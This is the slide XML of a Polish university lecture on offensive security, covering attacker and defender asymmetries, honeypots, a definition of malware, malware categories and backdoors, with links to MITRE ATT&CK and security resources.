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50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51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52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53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CEDB2DB-8FDF-4B8F-92D6-D6059ECAD42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E8BB868-2043-458A-BD54-79C8C79A032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317B3F3-0BEC-44A6-92D2-0FF7E120CF6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51300F8-C2AA-4797-9282-C8BD90FE9D7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59EBE3A-02E7-47A9-9B67-94707513131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BA6C7EE-0A72-417E-8375-D935E19C0AF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479D108-3AFC-48A5-9173-4F37FCA1BB4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B5B1D3B-183E-404D-AFC9-E9E4F4286AE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ADAABB8-2AD0-49F5-8539-124592FA568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C96E23D-7AFA-419C-85EA-AFC286E3226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B4E4BBE-AF1D-4461-8181-6B575F9493A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0044C6D-198E-4CAD-A092-FD7AB76A0F2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AF883A2-F27B-44DA-8E48-DFF63A213983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hyperlink" Target="https://nostarch.com/rootkits" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nostarch.com/rootkits" TargetMode="External"/><Relationship Id="rId3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s://github.com/danielmiessler/SecLists/tree/master/Web-Shells/" TargetMode="External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hyperlink" Target="https://www.youtube.com/watch?v=wXkN6WGvadM" TargetMode="External"/><Relationship Id="rId3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hyperlink" Target="https://github.com/ewilded/icmpsh-s-linux" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=wXkN6WGvadM" TargetMode="External"/><Relationship Id="rId4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hyperlink" Target="https://attack.mitre.org/resources/enterprise-introduction/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/resources/enterprise-introduction/" TargetMode="External"/><Relationship Id="rId4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hyperlink" Target="https://attack.mitre.org/tactics/pre/" TargetMode="External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hyperlink" Target="https://attack.mitre.org/tactics/pre/" TargetMode="External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hyperlink" Target="https://attack.mitre.org/matrices/enterprise/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/matrices/enterprise/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/matrices/enterprise/" TargetMode="External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hyperlink" Target="https://attack.mitre.org/techniques/T1189/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1133/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1200/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1091/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1195/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1199/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/" TargetMode="External"/><Relationship Id="rId10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hyperlink" Target="https://www.hak5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained" TargetMode="External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hyperlink" Target="https://po.edu.pl/" TargetMode="External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hyperlink" Target="https://attack.mitre.org/matrices/enterprise/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/matrices/enterprise/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/matrices/enterprise/" TargetMode="External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491480" y="0"/>
            <a:ext cx="9200160" cy="898560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="79000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="92000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="21600" indent="-11520" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="81000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Wykrywanie i reagowanie na incydenty bezpieczeństwa</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="35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object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1540440" y="4651200"/>
            <a:ext cx="9151200" cy="546840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="7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</a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3590" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Wykład #III – Bezpieczeństwo ofensywne</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3590" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7395480" y="3561480"/>
            <a:ext cx="27000" cy="6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410" spc="-38" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="9e9c9e"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="41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bject 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="12035520" cy="127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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Atakujący - czynniki sprzyjające i utrudniające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61" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550440" y="1608840"/>
            <a:ext cx="11446200" cy="517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</a:rPr>
              <a:t>Czynniki działające na korzyść atakującego:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>wykonuje pierwszy krok</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>wymyśla i znajduje nowe wektory ataków</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>przeważnie do sukcesu wystarczy, by udał się jeden atak (także im dłużej atakuje, tym większa szansa, że prędzej czy później coś mu się uda </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="pl-PL" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Wingdings"/>
              </a:rPr>
              <a:t>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</a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>znajomość defensywy jest </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>pomocna</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>, ale nie zawsze konieczna</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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</a:rPr>
              <a:t>Czynnniki działające na niekorzyść atakującego:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>nie zna środowiska, które atakuje (zdobycie tej wiedzy wymaga czasu, pracy i niesie ze sobą ryzyko wykrycia, szczególnie we wczesnej fazie - bo nie zna środowiska </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="pl-PL" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Wingdings"/>
              </a:rPr>
              <a:t>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)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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</a:rPr>
              <a:t>nie kontroluje atakowanego środowiska (zdobycie kontroli wymaga czasu, pracy, pokonania wielu trudności i niesie ze sobą ryzyko wykrycia </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="pl-PL" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Wingdings"/>
              </a:rPr>
              <a:t>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</a:rPr>
              <a:t>)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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="12035520" cy="127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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Broniący - czynniki sprzyjające i utrudniające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63" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550440" y="1608840"/>
            <a:ext cx="11446200" cy="438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</a:rPr>
              <a:t>Czynniki działające na korzyść broniącego:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>zna środowisko</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>kontroluje środowisko</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>przeważnie ma po swojej stronie wymiar sprawiedliwości i akceptację społeczną </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="pl-PL" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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</a:rPr>
              <a:t>Czynnniki działające na niekorzyść broniącego:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>nie wie, kiedy nastąpi atak</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>nie zna wektor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="pl-PL" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>a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</a:rPr>
              <a:t> ataku</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>sukces to brak porażki – konieczność obrony przed </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>wszystkimi</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="pl-PL" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> atakami</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>skuteczny 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</a:rPr>
              <a:t>broniący</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> MUSI 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</a:rPr>
              <a:t>mieć znajomość sztuki ofensywy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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Ofensywa kontra defensywa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65" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550440" y="1608840"/>
            <a:ext cx="11446200" cy="475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</a:rPr>
              <a:t>Przy pracy ofensywnej, bardzo przydaje się znajomość defensywy (ale </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>nie zawsze jest konieczna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</a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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</a:rPr>
              <a:t>Przy pracy defensywnej, znajomość ofensywy </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>jest konieczna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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Łatwiej jest odnieść sukces jako atakujący słabo znając sztukę defensywną, niż jako broniący słabo znający sztukę ofensywną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6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</a:rPr>
              <a:t>Cele nie są symetryczne:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>Głównym celem ofensywy jest </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>osiągnąć dany cel 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</a:rPr>
              <a:t>(np. system/bazę)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>Głównym celem defensywy </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>jest ochronić cel i powstrzymać ofensywę</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Drugorzędnym celem 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</a:rPr>
              <a:t>ofensywy jest </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>pokonać/uniknąć defensywy</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Drugorzędnym celem defensywy jest złapać atakujących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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Świadomość swoich czynników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67" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550440" y="1168560"/>
            <a:ext cx="11446200" cy="158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</a:rPr>
              <a:t>Zarówno w pracy w bezpieczeństwie ofensywnym jak i defensywnym, bardzo ważne jest:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>być świadomym swoich sprzyjających i utrudniających czynników</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>wykorzystywać sprzyjające i niwelować utrudniające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bject 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Świadomość swoich czynników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69" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550440" y="1137600"/>
            <a:ext cx="11446200" cy="435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</a:rPr>
              <a:t>Najlepszym przykładem jest defensywa jak najlepiej wykorzystująca swoją </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>znajomość i kontrolę własnej infrastruktury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</a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>utrzymywanie całej infrastruktury w ładzie, jednolitym standardzie, organizacji, spójnych politykach, ciągłego monitoringu stanu jej zabezpieczeń i funkcjonalności, bezpiecznej konfiguracji i aktualnych wersjach oprogramowania</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>prawidłowego stosowania wszelkich adekwatnych rozwiązań zabezpieczających</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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</a:rPr>
              <a:t>rozmieszczenie </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>honeypotów 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</a:rPr>
              <a:t>(“przynęty” na atakujących, jedynie udające element naszej infrastruktury, ale faktycznie przeznaczone wyłącznie do wykrywania ataków) - ang. “deception security”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38720" y="399240"/>
            <a:ext cx="11376720" cy="1051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9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Złośliwe oprogramowanie - ang. Malware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738720" y="1842120"/>
            <a:ext cx="10638360" cy="22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3500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>To, czy dane oprogramowanie klasyfikujemy jako złośliwe, jest bezpośrednio uzależnione od tego, czy jego aktywność jest zgodna z intencjami docelowego użytkownika lub właściciela docelowego systemu.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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738720" y="399240"/>
            <a:ext cx="11376720" cy="1051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9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Złośliwe oprogramowanie - ang. Malware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738720" y="1842120"/>
            <a:ext cx="10638360" cy="279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540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Przykładem mogą być dwie aplikacje z technicznego punktu  widzenia robiące to samo.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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54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540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Przykład #1:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00b050"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>- użytkownik </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00b050"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>świadomie</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00b050"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> za pomocą aplikacji mobilnej Facebooka wykonuje i wysyła </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00b050"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>znajomemu</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00b050"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> zdjęcie nowo zakupionego samochodu </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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54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738720" y="399240"/>
            <a:ext cx="11376720" cy="1051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9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Złośliwe oprogramowanie - ang. Malware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738720" y="1842120"/>
            <a:ext cx="10638360" cy="357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540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Przykładem mogą być dwie aplikacje z technicznego punktu  widzenia robiące to samo.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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54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540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Przykład #2</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>- złośliwa aplikacja mobilna (malware) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>bez wiedzy</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> użytkownika regularnie wykonuje i wysyła </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>wszystkie</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> zdjęcia na serwer kontrolowany przez przestępcę (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>z zamiarem zrobienia/wynalezienia zdjęć o charakterze osobistym/intymnym, mogących posłużyć do szantażu</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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54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738720" y="399240"/>
            <a:ext cx="11376720" cy="1051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9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Złośliwe oprogramowanie - ang. Malware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="776520" y="1657440"/>
            <a:ext cx="10638360" cy="50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Virus/Worm</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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Spyware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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Adware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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Cryptominer/Coinminer</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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Banking Trojan</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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Ransomware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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RAT (Remote Administration Tool)/Trojan horse (wyrafinowana odmiana to rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="pl-PL" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="pl-PL" sz="36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https://nostarch.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="pl-PL" sz="3600" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0563c1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/rootkits</a:t>
            </a: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)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738720" y="399240"/>
            <a:ext cx="11376720" cy="1051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"Tylna furtka" - ang. backdoor</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738720" y="1450800"/>
            <a:ext cx="10893240" cy="473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540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Funkcję backdoora może pełnić na przykład:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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40" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>zainstalowany w systemie malware (RAT/koń trojański, rootkit)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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40" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>drobna modyfikacja systemu, w wyniku której:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="120024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40" spc="-1" strike="noStrike">
